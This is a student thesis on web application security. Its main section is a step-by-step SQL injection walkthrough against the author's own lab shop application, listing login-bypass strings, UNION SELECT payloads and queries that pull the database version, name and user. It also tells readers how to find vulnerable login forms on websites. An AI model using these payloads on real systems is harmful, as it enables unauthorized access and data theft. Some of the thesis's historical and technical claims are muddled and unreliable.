Security Testing on Web Application. Prepared by: Tausif Aghariya S Supervisors: Krishnan Kannoorpatti, Sami Azam. School of Engineering and IT

(1)

2 Security Testing on Web Application

Prepared by:

Tausif Aghariya

S244431

Supervisors: Krishnan Kannoorpatti, Sami Azam

School of Engineering and IT

Faculty of EHSE

Charles Darwin University

Darwin

(2)

3

Acknowledgement

The writing of this thesis has been one of the most important parts in my Software

Engineering course. I express sincere thanks to my supervisors Krishnan Kannoorpatti and Sami Azam for their constant support and guidance. I like to say special thanks to my unit coordinator Mirjam Jonkman, my course coordinator Charles Yeo, Technical officer Balaji Iyyaswamy, Ashikali Hasan and Librarian Bandana Koirala for their all support and giving their precious time to finish this thesis.

(3)

4

Abstract

Approach towards most web-applications were unplanned, thus across a need to raise security standards as it requires much efforts to maintain in meeting its quality standards. With existing and new technologies like ASP, VB scripts, CGI, it's quite hard enough task to assess the quality of web because of the factors that influence the performance of the website. With data all over the place and with users having no minimal knowledge on how to protect their data, the dark side of technology always tried to devise its own path and is now affectation a serious threat to web security with new set of computer security vulnerabilities, SQL injection and cross-site scripting (XSS). Though there were some exploits such as buffer overflow, these SQL-Injections and cross-site scripting vulnerabilities are instances of the broader class of input validation, which are a result of changing security requirements. These input validation-based vulnerabilities therefore require fundamentally new techniques to characterize and mitigate them. This dissert focuses on how efficiently can we deal with these web security vulnerabilities, thus addressing active issues primarily with SQL injection attacks. Further we will divide the field of web applications to understand vulnerable domains and will focus on the approach which could be followed to address the exploits which could occur due to vulnerabilities and the approach or methodologies which we can use to give proper security to the web application.

Keywords: Web application security, web application vulnerabilities, Security testing methodologies

(4)

5

List of Figures

Figure 1 Reasons for problem statement ... 12

Figure 2 Web Application History (Owasp.org.au, 2015) ... 14

Figure 3 Architecture of web application (Antunes, Laranjeiro, Vieira,& Madeira, 2009) .... 16

Figure 4 External Attacker Motives over Web-App Attacks (Mcclure & Kruger, 2005) ... 18

Figure 5 Types of SQL Injection Attack (Ping-Chen, 2011) ... 27

Figure 6 Simple SQL Injection Attacks (Ping-Chen,2011) ... 28

Figure 7 Buy Cut Save Application Null Column Analysis ... 32

Figure 8 Buy Cut Save Application Fatching Database Version ... 33

Figure 9 Buy Cut Save Application Fatching Database Name ... 35

Figure 10 Buy Cut Save Application Fatching User Information ... 36

Figure 11 Buy Cut Save Application Database, Table and Column Emuniration... 37

Figure 12 Buy Cut Save Application Enumerating Column ... 38

Figure 13 Buy Cut Save Application Dumping Database ... 39

Figure 14 Buy Cut Save Application Blind SQL Injection Checking ... 40

Figure 15 Buy Cut Save Application Blind SQL Injection Checking ... 41

Figure 16 Buy Cut Save Application Getting Version in Mysql Database ... 42

Figure 17 Buy Cut Save Application Getting Version in Mysql Database ... 42

Figure 18 Buy Cut Save Application Enumerating Name from Database ... 43

Figure 21 Buy Cut Save Application Enumerating Column Name ... 45

Figure 22 Buy Cut Save Application Enumerating Column Name ... 46

Figure 23 History of Web application Development till Hacking Arrives (Owasp.org.au, 2015) ... 47

Figure 24 Security in SDLC Process (SANS Institute, 2007) ... 49

Figure 25 HTTP Strict Transport Security... 52

Figure 26 Australian Standard Input Validation Requirments ... 53

Figure 27 Steps for Security Testing ... 55

Figure 28 Top 10 Reported Vulnerabilities in Web Application ... 56

Figure 29 Agile Software Testing Process... 59

Figure 30 Penetration Testing ... 61

Figure 31 OWASP Testing Work Flow (Owasp.org.au, 2015) ... 62

(8)

9

Figure 33 Defensive Coding ... 67

Figure 34 Single Filter for Different Pages... 72

Figure 35 Web Application Filter Architecture ... 72

Figure 36 Buy Cut Save Application Login Page ... 73

Figure 37 Buy Cut Save Application Login Page ... 75

Figure 38 Buy Cut Save Application Category Form page ... 76

Figure 39 Buy Cut Save Application Category Form Page ... 77

(9)

10

List of Abbreviations

Abbreviation

API Application Programming Interface

BCS Buy Cut Save

CGI Common Gateway Interface

CSS Cascading Style Sheet

DB Database

ERP Enterprise Resource Planning

HSTC History of Science and Technology

HTML Hyper Text Mark-up Language

HTTP Hyper Text Transfer Protocol

HTTPS Hyper Text Transfer Protocol with Secure

socket layer

MD5 Message Digest 5

MySQL My software query Language

OWASP Open Web application security project

SDLC Security Development Life Cycle

SQLI Structure Query Language Injection

SSL Secure Socket Layer

UI Layer User Interface Layer

UML Unified Modelling Language

URL Uniform Resource Locator

XML Extensible Mark-up Language

(10)

11 I. Introduction

Gone are those days where web is all about static pages ( Html introduced to be static, as there were no form & input tags hence forth HTTP didn’t come up with a post method) with a very limited to nothing for user’s as the interaction. It all started in the year 1993 where The mosaic browser released extended features like lists, nested lists, added pictures, fill-out forms, etc., but received lot of uncertainties as it was not designed properly(Atefeh,Suhami, & Antunes, 2012). In the same year Common Gateway Interface (CGI) was designed which “dynamically generate HTML server-side scripts” on the given input. Then within no time the Netscape 2.0 came up with Java Scripting and made the world know the wonders of it and it still helping us in taking the technology to the next level (Ben, 2003). Microsoft in 1997 changed the face of World Wide Web by presenting Iframes as an internet explorer which leads to new revolutions in enhancing the browser technology by loading the data asynchronously and immediately Microsoft has pushed “XMLHTTP” interface on the release of IE5(Curphey& Arawo,2006). Slowly this technology picked up by other browsers which followed with “XMLHttpRequest”. The new millennium 2000, Web application took a new phase with Web application frameworks (Web 2.0, which allowed user to do more than just information retrieving) got introduced and the new era begun, we call it the fundamental step because Web 2.0 has created a platform for creating web –aware applications with high interactivity and user centric(Ben-Natan, 2005). Without Web 2.0 Internet would have been extremely different to present day, there would be no E-commerce (such as EBay, Flip kart, Amazon), web mails, internet messaging, Internet banking, international share trading, forums, web communities (Twitter). With the advent of Web 2.0 greater than before information sharing through networking communities and growing market in adoption of the web into business and delivery as a service, websites are often attacked directly as they stand as the face of business(Gavin, Eric & Schulte, 2005).

(11)

12 1.1 Motivation

 Problem Statement:

Vulnerabilities are still major security issues in web application and cause many exploits

 Reason for Problem:

Figure 1 Reasons for problem statement

However, as it’s defined in Figure 1, there are so many reasons for vulnerabilities are still present in web application. Now day’s developers try to add more and more functionality in the web application. That means developers need to write more code for the app and that creates infinite coding errors and more opportunity for vulnerable codes. The security testing methodologies and process of web application came on early 2001. So, developers are not getting sufficient security testing training. Moreover they are giving less priority on risk analysis. These are the reasons which I considered based on my research why vulnerabilities are still present in the web application.

(12)

13

 Proposed Solution:

The preferable solution for this problem is maintain the security standard of the web application by using suitable security testing methodologies and try to give proper security for vulnerabilities in web application.

 Overview of the Report:

This report mainly divided in to four phases. First phase includes the introduction of the web application, method of web application and its architecture, why security is necessary for web application and most prevailed vulnerabilities of the web application.

Second phase explained about SQL Injection attack which is world second highest attack technique on the web application. It includes how the SQL Injection works, types of SQL Injection and practical implemented in one BCS (Buy Cut Save) web application, hack the whole database of the web application by using SQL Injection technique.

Now from the third phase onwards, its starts to explain about the security testing practice, current situation for security testing approach, how different methodologies are available to use security testing process in development of web application, how’s Australian security standards are set for web application and by using the security testing process how we can save the BCS web application which we hack by using SQL injection.

 Tested Web Application:

The installation of vulnerable web application guided by my supervisors, however I established lab in CDU with the permission of IT department. I established my own server and domain in to the lab. And I install BSC PREDICTION web application for my SQL injection methods for testing. I used that lab for my all testing and thesis related work. The example vulnerable code is help full to illustrates the SQL injection vulnerability. The analysis is clearly visualized that the variable id is not filtered hence any of the input can pass through it to the application.

(13)

14 II. Literature review

2.1 Web Application Histories

The given Figure 2 explain about the how web application technologies arrive within the time frame. The present day web is completely embraced with millions of small, medium & Large scale businesses as an economical medium to communicate and exchange information with prospects and transactions with clients, partners and anyone in that matter. If we take a look at the current situation Large web apps are being developed and this have become unmanageable with messes of jQuery and the application backend code, leading flaws into the application(Fahad & Sarrab, 2011).

Figure 2 Web Application Histories (Owasp.org.au, 2015) 2.2 Web application and its components

It can be defined as highly programmed environment which can take and allow mass customization through the immediate deployment of a larger and diverse range of application, to billions across the globe. From past 10 years (or more), web has been playing a vital role in many of the business transactions (Cross, & Books24x7, 2007). Undoubtedly, it has been whole heartedly accepted by millions of people/businesses and it has become an inexpensive channel to communicate and exchange information.

In fact, Web provides a channel through which marketers can sell their products by advertising, analysing the number of people visiting their sites and communicating with them. People now a days are getting their work done sitting right in front of their computer/Mobile and no wonder that the reason behind this is the 'Web application(s)'(Doupé,

(14)

15 Cova&Vigna,2010). All the data regarding the transactions or may be any other should be fetched, processed and stored somehow for further use and this data can be retrieved through the web applications in the enquiry or the login forms. Common Examples of web applications include web mails, online banking/Shopping sites, google docs, gaming sites etc. (Antunes, Laranjeiro, Vieira, &Madeira, 2009).

A web application generally comprises of the following 3 layers:

The DATABASE layer (Model): This is where the entire information gets stored.

The OPERATIONAL layer (Controller): This is where the logic behind the application is written.

The UI layer (View): This is the interface through which user(s) interacts. 2.2.1 Database layer:

It is used to store the entire information. This layer is an internal interface and not exposed to the user. The DB access related calls are not made directly to the storage engine; instead, all the DB access is routed through the DB layer. All the data will be structured into objects and these objects in turn are stored in the form of tables and the attributes of an object are stored as columns in the Database.

The Database layer is responsible for fetching, creating, updating and deleting (CRUD operations) Individual Records, attributes and values within records. All the DB vendors provide their own interface tailored to their products, which leaves it to the application programmer to implement code for all the Database interfaces he or she would like to support. Some of the database vendors include oracle, SQL server, My SQL, DB2, PostgreSQL.

2.2.2 Operational layer:

This is the layer where the application related business logic is defined. It is solely responsible for handling user requests and rendering responses within stipulated time with the aid of DB & UI layers. Operational layer can be treated as a manager who ensures that all the resources needed for completing a task are delegated to proper layers. It also waits for the requests from clients, authenticates it, delegates’ data fetching or processing to the model, selects the data that is to be presented to the client and finally delegates rendering process to the UI layer. Some implementations of this layer include PHP, Perl, and ASP.

2.2.3 User Interface layer:

This is the interface where the User interaction happens. Whenever a user raises a request based on controller actions the data is retrieved from the underlying DB and rendered to the

(15)

16 HTML page or the UI for the user to consume. This layer is not limited to HTML or any text representation of data but also can deliver wide variety of formats such as Pictures, documents, Videos and any other format the user asks for. This layer makes use of the technologies like HTML, CSS, Java script (its frame works) and many more.

Figure 3 Architecture of web application (Antunes, Laranjeiro, Vieira, & Madeira, 2009)

As it mention in the Figure 3, Web applications can be defined as the computer programs which allow users to retrieve or submit data from (to) a database using a preferred web browser. Though there are many advantages of Web applications, one significant advantage is that they perform indecently. Web apps can be quickly deployed anywhere at no cost and no installation is required at user's end.

It's also quite important to understand that web application generally work over the http protocol, where http functions as a "request-response" protocol in the client-server protocol. A connection is established in the form of sessions, so called http sessions refer to a customized HTTP Cookie to associate a certain amount of information with the client. This cookie termed as Session Hash and is encrypted with a common practice to store users/clients access information.

(16)

17 2.3 Security needs for Web Application:

There is no doubt about it, with diverse techniques available to attackers made defending web applications a herculean task. SANS Institute rates " That Internet-facing Web sites that are vulnerable to attack as the second highest cyber security risk to enterprises"(Bayles Books24x7,2007).Web applications are now meant for cost-effective business solutions and are proved doing easy business. For the same reason they are widely used across all sectors which includes business, banking, finance, education, healthcare and technology among others(Bayles, A.W. & Books24x7,2007). Threats over the internet are so poised that nothing over the web is considered to be safe. Online services in integration with web applications had grown at a very brisk pace with a very minimal to no attention on the security which leads many numbers of corporate sites vulnerable to attacks.

Websites and Web applications facing towards the internet are low hanging fruits for the attackers as these applications handle so much of data which includes personal identifiable information or private data of the Organization and its clients, many prominent organizations have fallen prey for hackers because they invest too much on the network security and little over web application security which is all most like "We buy good doors when the problem is with windows"(Fong, Gaucher&Okun,2008). A security breach can put everything at stake. It damage trust of a customer, Reputation, Revenues and can also lead to legal liabilities. Website functionality is purely dependent on its web applications. These applications are programmed to capture, process, transmit & storage of personal and confidential information such as banking details, SSN, medical history. The other side of attacks is not to steal the data present in the database servers of the applications but to change the trusted websites into malicious websites for client side exploits (Razzaq, Hur, Farooq & Masood, 2012).

White Hat Sentinel, an Organization that assesses largest e-commerce, healthcare and technology service firms. Their security statistics report confirmed that 83% of the websites are prone to at least one severe vulnerability (Fonseca, Vieira&Madeira, 2007).

Web Applications will remain as punch bags of the internet. They are compromised in any of the two ways either by exploiting weakness in the application or by using impersonating with stolen credentials (McClure&Krüger, 2005). Verizon's DBIR suggests that 3,937 incidents are been recorded out of which 490 are confirmed data disclosure. Every two out of three attacks are somehow driven by the ideology and rules of the activists groups, less than one of envy three implied to financial motivated attackers with intension of espionage.

(17)

18 Figure 4 External Attacker Motives over Web-App Attacks (Mcclure & Kruger, 2005)

2.3.1 Financial motivated attacks:

Figure 4 explain about the every informational asset will and would have some value and it’s called as hack value for the attackers, Financial driven attacks are meant for gaining access to money, and for the same reason financial and retail organisations stand in as their prime scope because the data is meant to be money(Shelly,2010).If it is a financial industry/Organization the attacks will be majorly towards gaining access to the web application as this drives us in gaining logical access to the money. This means the user credentials and a single factor authentication achieves the desired result to the attacker. In order to steal the credentials there might be many known and reported tactics but the usual tactics which we come across are as follows (McClure& Krüger, 2005):

- Phishing techniques – tricks the user to supply the credentials, or by installing some malwares to steal the credentials.

- One among the oldest methods was password guessing attempts using Brute force techniques

- And with the rarest among all and requires skill to perform, is directly targeting the application using SQL Injections in that matter application level attacks or attacking the user management system itself for seeking user-credentials to bypass the authentication. Retails industry suffers with majority of attacks aimed for Payment card information with 95% of the total reported incidents were on stealing the Payment card information (Morgan,

0% 10% 20% 30% 40% 50% 60% 70%

Espionage Financial Idealogy/Fun

(18)

19 2006). This information is often easily accessible by simply exploiting any web application or stealing the saved credentials. Social engineering has also played and still playing its effective role as this family of attacks works pretty well enough. SQL injection dominance in web applications still continues with retail industry leveraging to 80% which is followed by techniques to install shells for local file inclusions (LFI), remote file inclusions (RFI) with 7 %( Meier& Meier, 2006).

2.3.2 Ideology Driven Attacks:

These attacks represent the identified motives in attacking web applications with attackers based out of different geographical locations. Majority of the attacks are focused on true exploiting of the targets (Simpson, Backman& Corley,2012).

The attacks are driven by different reasons but the Ideological attackers are very less concerned about getting the business data. It’s anticipated to see attacks majorly over defacement and to send a message or hijacking the server to attack others, which can even lead to cyber extortions. The webservers were the only assets targeted in most of the Ideology motivated attacks (Sarasan ,2013).

2.3.3 Attack-Discovery and Timeline:

Within financially motivated attacks the discovery can be recorded and the attack notification reported by the Customer itself, perhaps customer is the one to notice such fraudulent activity prior to anyone else. Below are the graphs for showing “Discovery Timeline with respect to Attacks” (Manuel Costa, Miguel Castro, Zhou, Zhang&Peinado, 2007).

2.4 Most prevailed vulnerabilities of Web application security

"What we need is more secure web application not just more security enabled application. The most important task in any industry is to identify the vulnerabilities before an attacker does and provide appropriate measures to safe guard the application and reputation of the organization from any attacks (Insight Security Research (NISR) publication, 2002). Not only discovering the vulnerabilities but also estimating the associated risks to business is also equally important. There might be any security assessment methodologies used by the Organizations in the development life-cycle of the application we might even find security concerns in design or architecture or might even be with the framework (Insight security research (NISR) publication, 2002). At the later stage where they may find security related issues with secure code review or by application security testing (Penetration testing). Or security weakness may not be identified even after its release and compromised. According to White Hat sentinel in correlation to a survey conducted for 76 Organization across different

(19)

20 industries, the result suggests that the software security controls and the software development lifecycle behaviours with respect to the vulnerability outcomes and with breaches reported are quite complicated to draw any conclusion (Tajpour, Ibrahim& Sharifi, 2012).

Reports like Verizon data breach report, OWASP Top 10, White Hat Sentinel, Symantec Threat report or essentially any other report in that context focus on identifying most severe risks for the Organization in different business areas. Any risk will be evaluated based on Security controls, threat agents and business impact of the organization. Business impacts are considered to be application/business specific and threat agents are application specific and these are dependent on the details of the application in respect to the enterprise (Oehlert, 2005). According to the web application security reports 2014 almost all the reports concluded in listing the same on the risks associated with attacks over web applications, the top 10 attack types have been and listed based on the attack type and its impact on the business(Howard, LeBlanc&Viega,2010). Howard, Leblanc and Viega descoverd top 10 web application attacks which are in appendix A.

III. Methodology and expremental scenario 3.1 SQL Injection Attack

Web applications had become more sophisticated and increasingly complex with its architecture. Their existence has given a new dimension to e-commerce, Entire price resources planning industry and its cleanly visible today as we are standing as end-users of these applications. With the availability of these enterprise systems and the sensitive data they store, handle and process had become critical to all major industry sectors not only for ecommerce industry (Bayles, A.W. & Books24x7, 2007).

SQL injections attacks are from the family of injection attacks. The term SQL is generally pronounced as sequel and stands for structured query language, and used in specifically querying the database (Antunes, Vieira, 2009). These are considered to be the most common application layer attack that is multifaceted and dominant. These attacks are only possible if the target applications have back-end database with improper coding and no proper control over input validation. On successful exploitation of these weakness will allow the attacker in Reading, Modifying(Insert-Update-Delete) sensitive data and has the capacity to provide administration access to the database where operations like shutting down the database, owning the data base is possible(Cross, & Books24x7,2007). Due to ubiquity of SQL across different platforms and databases this attack had found to be portable. In order to carry out

(20)

21 these families of attacks one should have immense knowledge on Client server Technologies, Web applications, databases and also patience (Portland, 2013).

Appendix D intoduced by Razzaq, Hur, Farooq& Masood in 2012 which is explaining about the attacking factors and impacts of the SQL Injection attack.

Attacks which use SQL injection target those websites or web-applications which allow submitting data and retrieving the data from the databases over the internet. Databases are playing a vital role in the functioning of modern day websites or web-applications as they store the data required for the web sites or applications to render its services by providing appropriate content to its authorized customers, stakeholders and employees (Cross, & Books24x7, 2007). Data associated to end-user credentials, banking information, companies’ proprietary information may reside in the database and can be accessed by authorised users via customized or off-the-shelf applications.

SQL injection attacks are performed by crafted SQL codes which are appended or inserted into the web application as user input parameters which tricks the interpreter and executes itself in the form of queries to the database. Any system that constructs the SQL Queries might be vulnerable, SQL as a language for specifically constructing queries to the databases will provide a diversified coding options (Dharam, Shiva, 2014).

Based on the application functioning and processing of user-supplied-data, SQL injection attacks can be used to perform the following types of attacks (Doupé, Cova&Vigna, 2010):

 Authentication Bypassing: using this attack, an attacker logs onto an application without providing valid username and password, gains administrator privileges.

 Information Disclosure: Using the attacks, an attacker can obtain sensitive information that is stored in the database.

 Compromised Data Integrity: An attacker uses this attack to deface a website / webpage, insert malicious content into web pages, or alter the contents of a database.

 Compromised Availability of data: Attackers use this attack to delete the database information, delete log, or audit information that is contained in a database.

 Remote Code Execution: It allows an attacker to compromise the host operating system. Example of a small basic SQL vulnerability:

Let's consider an example of a web application which is hosted by a bookstore to make their service available to the customers online.

(21)

22 3.2 SQLI Bypass Authentication Attack

As customers search for all books in the store published by some publisher XYZ, the application will perform the below query (Shar&Tan, 2013):

 Select Author, Book_name, published_year from bookstore where publisher = 'XYZ'

Let's consider if a customer searches for books that are published by T'XYZ. Then application performs the below query.

 Select Author, Book_name, published_year from bookstore where publisher = T'XYZ

Incorrect Syntax Server Error msg

Unclosed Quotation mark before the character string

Note: When application is subjected to behave this ways, then we can say this application is open for SQLi attacks.

This flaw allows an attacker to manipulate the query in way where it can retrieve information of every book present in the bookstore, by using the below string:

XYZ' or 1=1--

Let’s insert the above crafted string into the Query for an unprecedented output:

 SELECT Author, Book_name, Published_year from bookstore where publisher = 'XYZ' or 1=1--'

As it is a known fact that 1always equals to 1, permits the database to retrieve every book present in the table - bookstore.

Note: "--" (double hyphen) in SQL means to tell the interpreter to ignore the rest of the line after it as it is a comment. But with MySQL there should be a space or "#" after "--" to specify as a comment.

In certain instances, a very small and simple SQL injection flaw might have an immediate critical level impact. Most of the applications are running with form-based-login function, it uses a database to store the user's authentication information (Credentials) and performs a SQL query to verify each login attempt made by the user. Below a small example of a query on the same:

SELECT * from users where username = 'JOHN' and passwd = 'NHOJ'

An attacker can inject his crafted request either in the username text-field or in the password text-field to alter the query for his own requirement. Let's assume for instance if the attacker have knowledge about the administrator username of the application as "administrator". Now

(22)

23 that he knows the user name he can log in as admin just by supplying any password and username as following:

Admin'--

By inserting “admin" in the query the query seems to be as following: Select * from users where username = 'admin'--' AND passwd = 'abcdef'

With the comment symbol before the password, the execution of validating the password has been bypassed.

Now if the attacker is unaware of the administrator's username. The following might help an attacker to gain the access.

- Normally in most of the application, the first account in the database will be of Admin user, as this account will be used to create other accounts in the application.

- Further, if the submitted query retrieves an output with more than one user, many applications will simply process the details of the first user.

An attacker can frequently exploit to log in to the application as the first user of the database by passing the following string in the query as username:

‘OR 1=1--

This allows the application to perform the following query

SELECT * from users where username = " OR 1=1--' AND password = 'abcde'

- In most of the cases, SQL injection vulnerability may be identified and verified just by passing a single un-trusted input into the application.

Below are the snap shots of the testing which I did in my lab on BCS web application which developed by me. Also I used that web application for testing.

 user fills out the login form like this: Login: ' OR ''='

Password: ' OR ''='

 This will give SQLQuery the following value:

SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''='‘

 Instead of comparing the user-supplied data with that present in the Users table, the Query compares '' (nothing) to '' (nothing), which, of course, will always return true.

(23)

24  We can see in snap shot it fill user name as ' OR ''=' and password as ‘OR”=’. Instead of comparing the user-supplied data with that present in the Users table, the query compares '' (nothing) to '' (nothing), which, of course, will always return true. You can see in below snap shot user can enter in the main page with the use of bypass authorization methods of SQl injection.

(24)

25 There even may be instances where flaws can be very subtle and can make things hard in distinguishing other categories of vulnerabilities or from small security weakness that do not pose any threat(Cross, & Books24x7,2007).

Note: With applications accessing the back-end database, it quite important to verify URL parameters, POST functions implemented by application, HTTP Headers, Cookies.

Attack characters Description

' or " character string indicators

-- or # Single line comment

/*...*/ Multiple line comment

?parmeter1=xyz&Parameter2=123 URL Parameters

PRINT Will be useful as non-transactional command

@variable Local variable

@@variable Global variable

@@version To display SQL server version

In order to successfully exploit any SQL injection vulnerability it is necessary to break the quotes. As the end user passed input data gets incorporated in the form of SQL command and the input will be placed in single quotes (Cross, & Books24x7, 2007).

(25)

26 Detect SQL Injection Issues: Try passing a single quote as an unexpected character input and observe if any error or the result is in any other way to know where exactly the user given input is not sanitized.

If there is an error or a strange behaviour observed, pass second single quote meaning two single quotes together. It is a known fact that databases use couple of single quotes as an escape sequence. But here it got interpreted as the string in between the single quotes and not as the closing string terminator. And now if the result is error free or the strange behaviour gets disappeared, then yes the application is most likely vulnerable to injection attacks (Anley, 2007).

To conclude the existence of the injection flaws, the SQL concatenating characters to craft a string. If the application responds the crafted input with the expected output, then the application is said to be vulnerable. Every database uses its own method in string concatenation.

Detect Input Sanitization:

Usage of "right-square-bracket "(the] character) as an input character in verifying the instances on where exactly the given input is getting used as SQL identifier without any sanitization.

 Detecting Truncation Issues:

Pass lengthy strings of unexpected data into the application in a way we submit the input to check for any instance of buffer overflows. These actions may throw SQL errors on the page if they are vulnerable.

Database type String Concatenation characters

Oracle '||'

MS-SQL '+'

MySQL ' '(Space between two single quotation

marks)

Note:

- To confirm whether the application is accessing the database is by using “%"( A wildcard character) in the input.

- Submitting wildcard character - % in the search field will often produce many results, which indicated that a SQL query got executed in the associated database.

(26)

27 3.3 Types of SQL Injection:

Figure 5 Types of SQL Injection Attack (Ping-Chen, 2011)

The types of SQL injection are categories in the Figure 5. Which has simple SQL injection method, Blind SQL injection method and the sub types of simple SQL injection are union SQL injection and Error based SQL injection. All the types are going to explain in more details in report.

SQL Injection

Simple SQL

injection

Union SQL

Injection

Error Based

SQL Injection

Blind SQL

Injection

(27)

28 3.3.1 Simple SQL injection Attacks (Ping-Chen, 2011):

Figure 6 Simple SQL Injection Attacks (Ping-Chen, 2011)

Above Figure 6 explain about the functions and the statement which use to perform SQL injection attack. Attacker can use Union Query, system store procedure, end line comment, tautology and illegal/ logical incorrect query.

3.3.2 SQL Injection in MySQL By using URL method

Generally attacker may perform his attack for testing vulnerability by passing quote as an input if application return with an error massage then it may be consider that web application is vulnerable to SQL Injection (Sutton, Greene& Amini,2007). Error massage varies and depends on the type of database so it may possible that you may get different error in different web application. Finding a SQL Injection Vulnerability before launching a SQL injection attack, the hacker determines whether the configuration of the database and related tables and variables is vulnerable. The steps to determine the SQL Server’s vulnerability are as follows (Naresh, Soujanya, Yugandhar&Rao ,2011):

Union Query

•"UNION SELECT" statement returns the union of the intended dataset with the target dataset.

•Eg: select Name, Phone, Address from Users where id=1 UNION ALL SELECT creditcard

System Stored Procedure

•Attackers exploit database's stored procedures to perpetrate their attacks

End if line Comment

•After injecting the crafted code into a specific field, legitimate code that follows is nullified through usage of end of line comments

•Eg: select * from user where name = 'xyz' and userid IS NULL; --';

Tautology

•Injecting statements that are always true so that queries always return upon evaluation of a WHERE condition

•Eg: SELECT * FROM users WHERE name = ' ' OR '1'='1';

Illegal/Logically Incorrect Query

•An attacker may gain knowledge by injecting illegal/logically incorrect requests such as injectable parameters, data types, names of tables etc.

(28)

29 1. Using your web browser, search for a website that uses a login page or other database input or query fields (such as an “I forgot my password” form). Look for web pages that display the POST or GET HTML commands by checking the site’s source code.

2. Test the SQL Server using single quotes (‘’). Doing so indicates whether the user input variable is sanitized or interpreted literally by the server. If the server responds with an error message that says use 'a'='a' (or something similar), then it’s most likely susceptible to a SQL injection attack (Cross, 2007).

3. Use the SELECT command to retrieve data from the database or the INSERT command to add information to the database.

For this thesis, I used BCS application which I developed during my academic project. The name of the application is BSC (Buy Cut Save) PREDICTION. It is an application which provides information to the customers for giving meat order. So, based on that order butcher can see the all orders of the customers and he can put more meat items in the web application. So by using MySQL injection by using UML method, I exploited the all personal customers’ information such as email, contact, company name, etc. and the all database and get the butcher information as well. So, the all following tests done on local host server with this application.

3.3.2.1 Adding Malicious Characters

In a link of a website you may find that there is an "=" sign. In order to perform an SQL injection on website, you will need to type commands after the "=" sign. Simply start typing the commands after the equals sign and click "Go" in your web browser, as if you are going to a new website. The simplest way to understand what you need to do is to see an example attack broken down into steps (Palmer, 2007).

Suppose we found a site which contain = sign mean it is database related website, now we need to determine if link is vulnerable. Let's say that we have some site like this

http://localhost/bcs/admin/category_form.php?id=1

Now to test whether the link is vulnerable or not we need to add (Quote) ‘to the end of URL. For example

(29)

30 If we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar that means this site is vulnerable to SQL injection.

3.3.2.2Analysing Errors

Every database has different syntax so you will receive different error message of each database. Appendix C has included some error message of some of database (Mirdula&Manivannan, 2013).

If you are not receiving error like above then we must have to move to next link for test the vulnerability. So it is very time consuming process to first we have to collect each and every link of the web application and then we must have to test each link by the payload. If you have received penetration contract of any large web application then it may possible that it cannot complete the process in the limit of time (Mirdula&Manivannan, 2013).

3.3.2.3 Gathering Information

Once attacker receive the information about the vulnerable web link he then start to perform the enumeration task of various database related information. Enumeration contain various operation such as null column analysis, database version enumeration, column enumeration

(30)

31 etc… in this topic we will understand that how we can enumerate database if a web application suffer from SQLI bug(Antunes, Vieira,2009).

3.3.2.4Enumerating column length MySQL Database

As we know that from previous practical it received the SQL injectable URL so now it is vulnerable site, we are going one step up so we gone a enumerate a website to find number of columns. For that we can use statement ORDER BY (tells database how to order the result). Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+order+by+1--<-- no error

http://localhost/bcs/admin/category_form.php?id=1+order+by+2--<-- no error

http://localhost/bcs/admin/category_form.php?id=1+order+by+3--<--no error

http://localhost/bcs/admin/category_form.php?id=1+order+by+4--<-- error ( got message like this Unknown column '4' in 'order clause' or something like that)

All need to do is just incrementing the number until we get an error like below.

In above example it seen that received error at 4 it means that it has 3 columns, because we got an error on 4.

After getting injection point Now we need to check for UNION function with union we can select more data in one SQL statement(Messmer ,2008). So we can build the query as below:

(31)

32 Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3

Above URL may be called as exploitable URL.

3.3.2.5Null Column Analysis Manually

First of all we may add comment to behind the exploitable URL such as /* or --. Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3/*

NOTE: if /* not working or we get some error, then try -- for example Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1 union all select

1,2,3--It's a comment and it's important for our query to work properly. Once we will execute above URL in the browser after we will able to see the numeric value in the browser let say that we have number 2 on the screen. That means number 2 is my null column for this web link. We can exploit my sql commands through this column (Mcallister, Kirda& Kruegel, 2008).

(32)

33 Above Figure 7 is the snap shot of finding the null column in the BCS web application by performing sql injection attack.

3.3.2.6Fetching Database Version Manually

For checking the version of the database we can simply use @@version or version () function to get the version of the database. As we discussed previous number 2 column is null column so, we can simply put this function instead of number two in our exploitable URL (Shar&Tan, 2013).

Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,

version(),3--Figure 8 Buy Cut save Application Fetching Database Version

Above Figure 8 is the snap shot of experimented sql injection query and exploited the database version in the category title colomn. It can see when we put my exploitable URL in

(33)

34 to this web page we can get the version of the database. Its showing in the picture 5.6.16 is the version of the database.

If we get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." then the convert (), hex () and unhex() function can be use (Easttom,2012).

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1, convert(@@version using

latin1),3--http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,

unhex(hex(@@version)),3--And you will get MySQL version of the database.

3.3.2.7Fetching Database name

To check for database name we can use the database () function for test this we need to replace the number 2 with database() and get something like similar to below image(Alanazi&Sarrab, 2011).

(34)

database(),3--35 Figure 9 Buy Cut save Application Fetching Database Name

You can see from Figure 9 we change the database () with column number 2. And we got the name of the database INFORMATION_SCHEMA.

3.3.2.8Fetching User information

To check for the information about which user is using this database we will replace the number 2 with user () and get something like bellow (Oehlert, 2005):

(35)

user(),3--36 Figure 10 Buy Cut save Application Fetching User Information

We can see in Figure 10, by applying user () we got the user name root@localhost that is using this database. This web application is running on local host server.

3.3.2.9Database, Table, and Column Enumeration

Once the database information enumeration complete successfully now the next step is to follow to get the list of database table and column name. In this topic it will understand that how it can enumerate the column and table name of the database if the web application is suffering the SQL injection vulnerability (Alanazi& Sarrab, 2011).

 Enumerating Table Name for MySQL version <5:

Now, we get the version now we will enumerate the database column name and table for Getting table and column name well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) we must guess table and column name in most cases. Common table names are: users, admin, and member... common column names are: username, user, user_name, password, pass, passwd, pwd etc...

